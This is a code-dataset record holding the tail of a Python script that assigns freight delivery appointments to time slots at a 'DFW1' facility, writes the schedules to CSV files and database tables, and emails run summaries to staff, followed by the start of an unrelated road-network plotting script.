bulk_break[(k,'15:00:00')] = '1'\r\n elif sch_slot[(k,'08:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'08:00:00') in out_3:\r\n out_3[(k,'08:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'08:00:00','c')] = sch_slot[(k,'08:00:00','c')] + 1\r\n bulk_break[(k,'08:00:00')] = '1'\r\n else:\r\n out_3[k,'08:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'08:00:00','c')] = sch_slot[(k,'08:00:00','c')] + 1\r\n bulk_break[(k,'08:00:00')] = '1'\r\n elif sch_slot[(k,'19:00:00','c')] < 1:\r\n if p == 0:\r\n if (k,'19:00:00') in out_3:\r\n out_3[(k,'19:00:00')].append(a)\r\n p = 1\r\n sch_slot[(k,'19:00:00','c')] = sch_slot[(k,'19:00:00','c')] + 1\r\n bulk_break[(k,'19:00:00')] = '1'\r\n else:\r\n out_3[k,'19:00:00'] = [a]\r\n p = 1\r\n sch_slot[(k,'19:00:00','c')] = sch_slot[(k,'19:00:00','c')] + 1\r\n bulk_break[(k,'19:00:00')] = '1'\r\n else:\r\n pass\r\n \r\n elif vas_flag[a] == '1':\r\n if j == 1:\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] < 2 :\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and sch_slot[(k,d)] <= 2 and sch_vas_fl[(k,d)] == '0':\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else: \r\n pass\r\n else:\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] < 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and sch_vas_fl[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and sch_slot[(k,d)] <= 3 and sch_vas_fl[(k,d)] == '0':\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n sch_vas_fl[(k,d)] = '1'\r\n else: \r\n pass\r\n \r\n if p == 1:\r\n gh = 0\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if sch_vas_fl[(k,d)] == '1' and gh != 0 and gh != len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n elif sch_vas_fl[(k,d)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n elif j == k and sch_vas_fl[(k,d)] == '1' and gh == len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n gh = 0\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if sch_vas_fl[(k,d)] == '1' and gh != 0 and gh != len(night_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n elif sch_vas_fl[(k,d)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n elif sch_vas_fl[(k,d)] == '1' and gh == len(night_slots)-1:\r\n w = gh-1\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n elif b[a] == '1':\r\n if j == 1:\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] < 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else: \r\n pass\r\n else:\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] < 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else:\r\n pass\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if p == 0 and bulk_break[(k,d)] == '0' and sch_slot[(k,d)] <= 2:\r\n if (k,d) in out_3:\r\n out_3[(k,d)].append(a)\r\n else:\r\n out_3[(k,d)] = [a]\r\n p = 1\r\n bulk_break[(k,d)] = '1'\r\n else: \r\n pass\r\n \r\n if p == 1:\r\n gh = 0\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if bulk_break[(k,d)] == '1' and gh != 0 and gh != len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[k]]):\r\n bulk_break[(k,day_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots):\r\n bulk_break[(k,day_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1\r\n gh = 0\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if bulk_break[(k,d)] == '1' and gh != 0 and gh != len(night_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[k]]):\r\n bulk_break[(k,night_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots):\r\n bulk_break[(k,night_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1\r\n else: #other appointments\r\n if j == 1:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if l not in st_slot:\r\n if sch_slot[(k,l)] < 1:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n \r\n if p == 0:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 2:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1 \r\n if p == 0:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(day_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] <= 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if l not in st_slot:\r\n if sch_slot[(k,l)] < 1:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 2:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] < 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n for l in sorted(night_slots[date_fl[k]]):\r\n if sch_slot[(k,l)] <= 3:\r\n if p == 0:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(a)\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n out_3[(k,l)] = [a]\r\n p = 1\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n if p == 0:\r\n missed_ref.append(a)\r\n logger.info(\"Completed Scheduling time slots\") \r\n print(M1)\r\n logger.info(\"No.of times day model failed: \"+ str(M1))\r\n print(M2)\r\n logger.info(\"No.of times shift model failed: \"+ str(M2))\r\n data = {}\r\n #Printing Schedule with units\r\n out_file = open('SCHEDULE_DFW_UNITS.csv','w')\r\n out_file.write('Id'+','+'Scheduled_date'+','+'shift'+','+'units'+','+'sku'+','+'VRDD-ORDD'+','+'VRDD'+','+'UPT_type')\r\n out_file.write('\\n')\r\n M3 = 0\r\n for i,j in sorted(out_2.keys()):\r\n for k in out_2[(i,j)]:\r\n out_file.write(str(k)+','+str(i)+','+str(j)+','+str(units_sku_obj[k][0])+','+str(units_sku_obj[k][1])+','+str(units_sku_obj[k][2])+','+str(dt[k][0]))\r\n out_file.write('\\n')\r\n out_file.close()\r\n a = str(dtm.datetime.today())\r\n logger.info(\"Writing Output to a CSV file\") \r\n #Printing the output schedule \r\n out_file = open('SCHEDULE_DFW_'+str(date)+'_.csv','w')\r\n out_file.write('Reference_number'+','+'PO_number'+','+'Scheduled_date'+','+'Scheduled_time'+','+'units'+','+'sku'+','+'hj_rank'+','+'vendor'+','+'carrier'+','+'delete'+','+'ORDD'+','+'VRDD'+','+'vas_units'+','+'VNA'+','+'Reason')\r\n out_file.write('\\n')\r\n for i,j in sorted(out_3.keys()):\r\n for k in out_3[(i,j)]:\r\n for l in ref_num[k]:\r\n if (vendor[k],j) in std_no:\r\n out_file.write(str(k)+','+str(l)+','+str(i)+','+str(j)+','+str(po[(k,l)][0])+','+str(po[(k,l)][1])+','+str(hj_rank[k])+','+str(v_name[k])+','+str(csr[k])+','+'N'+','+str(ordd[l])+','+str(vrdd[k])+','+str(vas_units[k])+','+'419'+','+str(std_no[(vendor[k],j)]))\r\n out_file.write('\\n')\r\n data[M3,l] = [a,k,l,i,j,po[(k,l)][0],po[(k,l)][1],v_name[k],cr_dt[k],'DFW1','Daily']\r\n else:\r\n out_file.write(str(k)+','+str(l)+','+str(i)+','+str(j)+','+str(po[(k,l)][0])+','+str(po[(k,l)][1])+','+str(hj_rank[k])+','+str(v_name[k])+','+str(csr[k])+','+'N'+','+str(ordd[l])+','+str(vrdd[k])+','+str(vas_units[k]))\r\n out_file.write('\\n')\r\n data[M3,l] = [a,k,l,i,j,po[(k,l)][0],po[(k,l)][1],v_name[k],cr_dt[k],'DFW1','Daily']\r\n M3 = M3+1\r\n df_out = pd.DataFrame(data = data.values())\r\n for i,j in rsch.keys():\r\n out_file.write(str(i)+','+str(j)+','+str(rsch[(i,j)][0])+','+str(rsch[(i,j)][1])+','+','+','+','+','+','+'Y')\r\n out_file.write('\\n')\r\n out_file.close()\r\n logger.info(\"CSV file is created\")\r\n logger.info(\"Writing data into Sandbox table\")\r\n #Writing Exception day model\r\n if df_day.empty == False:\r\n df_day.columns = ['rt','portal_fc','po_fc','ref','po','vrdd','cr_dt','rc']\r\n for index,row in df_day.iterrows():\r\n cur.execute('INSERT INTO sandbox_supply_chain.iso_exception (\"rundate\",\"portal_fc\",\"po_fc\",\"Ref_no\",\"PO_no\",\"VRDD\",\"created_dt\",\"reason_code\") VALUES (?,?,?,?,?,?,?,?)',\r\n (row['rt'],row['portal_fc'],row['po_fc'],row['ref'],row['po'],row['vrdd'],row['cr_dt'],row['rc']))\r\n #Writng Exception Shift model\r\n if df_sh.empty == False:\r\n df_sh.columns = ['rt','portal_fc','po_fc','ref','po','vrdd','cr_dt','rc']\r\n for index,row in df_sh.iterrows():\r\n cur.execute('INSERT INTO sandbox_supply_chain.iso_exception (\"rundate\",\"portal_fc\",\"po_fc\",\"Ref_no\",\"PO_no\",\"VRDD\",\"created_dt\",\"reason_code\") VALUES (?,?,?,?,?,?,?,?)',\r\n (row['rt'],row['portal_fc'],row['po_fc'],row['ref'],row['po'],row['vrdd'],row['cr_dt'],row['rc']))\r\n #writing ISO output\r\n if df_out.empty == False:\r\n df_out.columns = ['rt','ref','po','dt','tm','units','sku','vendor','cr_dt','FC_nm','Batch']\r\n for index,row in df_out.iterrows():\r\n cur.execute('INSERT INTO sandbox_supply_chain.ISO_OUTPUT_NEW (\"rundate\",\"Reference_number\",\"PO_number\",\"Sch_date\",\"Sch_time\",\"Units\",\"SKU\",\"vendor\",\"Created_dt\",\"FC_nm\",\"Batch\") VALUES (?,?,?,?,?,?,?,?,?,?,?)',\r\n (row['rt'],row['ref'],row['po'],row['dt'],row['tm'],row['units'],row['sku'],row['vendor'],row['cr_dt'],row['FC_nm'],row['Batch']))\r\n bulk_e = {}\r\n cnt = 0\r\n for i,j in sorted(out_3.keys()):\r\n dt = pd.to_datetime(i).date()\r\n tm = pd.to_datetime(j).time()\r\n combine = dtm.datetime.combine(dt,tm)\r\n est = pytz.timezone('US/Eastern')\r\n loc = est.localize(combine)\r\n utc = pytz.utc\r\n loc = loc.astimezone(utc)\r\n loc = loc.replace(tzinfo = None)\r\n for k in out_3[(i,j)]:\r\n for l in ref_num[k]:\r\n bulk_e[cnt] = [str(k),str(l),str(i),str(j),a,'0',a,'1',a,'1','DFW1',int(inc[k]),'419',str(loc)]\r\n cnt = cnt+1\r\n df_bulk = pd.DataFrame(data = bulk_e.values())\r\n if df_bulk.empty == False:\r\n df_bulk.columns = ['ref_no','po','date','time','csv_tm','csv_fl','hj_tm','hj_fl','bul_tm','bul_fl','FC_nm','inc_no','fr_type','gmt']\r\n for index,row in df_bulk.iterrows():\r\n cur.execute('INSERT INTO sandbox_supply_chain.iso_bulk_email (\"reference_number\",\"PO_number\",\"Scheduled_date\",\"Scheduled_time\",\"csv_timestamp\",\"csv_flag\",\"HJ_timestamp\",\"HJ_flag\",\"bulk_mail_timestamp\",\"bulk_mail_flag\",\"FC_nm\",\"Incident_NO\",\"Freight_type\",\"utc_time\") VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?)',\r\n row['ref_no'],row['po'],row['date'],row['time'],row['csv_tm'],row['csv_fl'],row['hj_tm'],row['hj_fl'],row['bul_tm'],row['bul_fl'],row['FC_nm'],row['inc_no'],row['fr_type'],row['gmt'])\r\n \r\n logger.info(\"Completed writing data into sandbox table\")\r\n sum1 = 0\r\n for i in out_1.keys():\r\n sum1 = sum1 + len(out_1[i])\r\n print(sum1)\r\n logger.info(\"No.of incidents in a day: \"+ str(sum1))\r\n \r\n sum3 = 0\r\n for (i,j) in out_3.keys():\r\n sum3 = sum3 + len(out_3[(i,j)])\r\n print(sum3)\r\n logger.info(\"No.of incidents scheduled: \"+ str(sum3))\r\n cnt = 0\r\n for i in vas_flag.keys():\r\n if vas_flag[i] == '1':\r\n cnt = cnt+1\r\n else:\r\n pass\r\n print (cnt)\r\n end_time = time.time()\r\n execution = end_time-start_time\r\n print(execution)\r\n logger.info(\"Execution time: \"+ str(execution)+\" SECONDS\")\r\n \r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com'\r\n to = ', '.join(toaddr)\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"Algorithm Successfully ran for DFW1\" \r\n body = \"Hello, \\nNo.of times Day Model failed: \"+str(M1)+\"\\nNo.of times Shift model failed: \"+str(M2)+\"\\nNo.of Incidents Requested: \"+str(sum1)+\"\\nNo.of Incidents Scheduled: \"+str(sum3)+\".\\nThanks\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr))\r\n if M1 > 0 or M2 > 0:\r\n if M1 > 0 and M2==0:\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n file_list = ['day_model_DFW.ilp']\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"LP Model Failed for DFW1 at day level\" \r\n body = \"Hello, \\nModel Failed at day level for\"+str(M1)+\"times.\\nThanks\\nVenkatesh\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n for j in file_list:\r\n file_path = j\r\n attachment = open(file_path, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % j)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr))\r\n elif M1==0 and M2 > 0:\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n file_list = ['shift_model_DFW.ilp']\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"LP Model Failed for DFW1 at shift level\" \r\n body = \"Hello, \\nModel Failed at shift level\"+str(M2)+\"times.\\nThanks\\nVenkatesh\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n for j in file_list:\r\n file_path = j\r\n attachment = open(file_path, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % j)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr))\r\n elif M1 > 0 and M2 > 0:\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n file_list = ['shift_model_DFW.ilp','day_model_DFW.ilp']\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"LP Model Failed for DFW1 at day level and shift level\" \r\n body = \"Hello, \\nModel Failed at day level\"+str(M1)+\"times and shift level\"+str(M2)+\"times.\\nThanks\\nVenkatesh\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n for j in file_list:\r\n file_path = j\r\n attachment = open(file_path, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % j)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr)) \r\n cxn.close()\r\n logger.info(\"Vertica is Disconnected\")\r\nexcept Exception as e:\r\n print(\"Error Reported\")\r\n logger.error(\"Error in the code: \"+str(e))\r\n fromaddr = 'scsystems@chewy.com'\r\n toaddr = 'vmanohar@chewy.com,igonzalez1@chewy.com,EAlfonso@chewy.com,jxie@chewy.com'\r\n to = ', '.join(toaddr)\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = \"Algorithm did not run for DFW1\" \r\n body = \"Hello, Algorithm failed for the following reason :\"+str(e)+\"\\nThanks\"\r\n msg.attach(MIMEText(body, 'plain'))\r\n server = smtplib.SMTP('smtp.chewymail.com', 25)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr.split(','), text)\r\n logger.info(\"Email was sent to the recipients: %s\" %(toaddr))\r\n server.quit()\r\n print(\"Email was sent to the recipients: %s\" %(toaddr))\r\n logger.info(\"Vertica is Disconnected\")\r\n cxn.close()\r\nrh.close()\r\n", "sub_path": "ISO_DFW.py", "file_name": "ISO_DFW.py", "file_ext": "py", "file_size_in_byte": 98033, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 44, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 45, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 46, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 48, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 58, "usage_type": "call"}, {"api_name": "pyodbc.connect", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 484, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 501, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 501, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 523, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 536, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 556, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 578, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 597, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 653, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 681, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1222, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1322, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1338, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 1712, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1712, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1730, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 1758, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 1759, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 1760, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1760, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 1770, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1796, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1804, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1809, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 1810, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1822, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1827, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 1831, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 1833, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 1833, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 1836, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1847, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1852, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 1856, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 1858, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 1858, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 1861, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1872, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1877, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 1881, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 1883, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 1883, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 1886, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 1900, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 1905, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 1906, "usage_type": "call"}]} +{"seq_id": "427984820", "text": "import matplotlib.pyplot as plt\nimport csv\nimport pandas as pd\nimport subprocess\nimport sys\nimport mplleaflet\n\nMVN_PATH = 'C:/Program Files/JetBrains/IntelliJ IDEA 2019.1.2/plugins/maven/lib/maven3/bin/mvn.cmd'\nmaps = ('helsinki',\n 'amsterdam',\n 'san_francisco',\n 'reykjavik',\n 'wellington',\n 'saint_petersburg',\n 'melbourne',\n 'quito',\n 'beijing',\n 'lausanne',\n 'sao_paulo',\n 'rome',\n 'berlin',\n 'osnabrueck')\n\n\ndef plotRoad(filename):\n print(\"Plotting road network\")\n df = pd.read_csv(filename, delimiter=\" \")\n df['lon'] = df['lon'].apply(\n lambda x: float(x.split()[0].replace(',', '.')))\n df['lat'] = df['lat'].apply(\n lambda x: float(x.split()[0].replace(',', '.')))\n\n for way, pos in df.groupby('way'):\n plt.plot(pos['lon'], 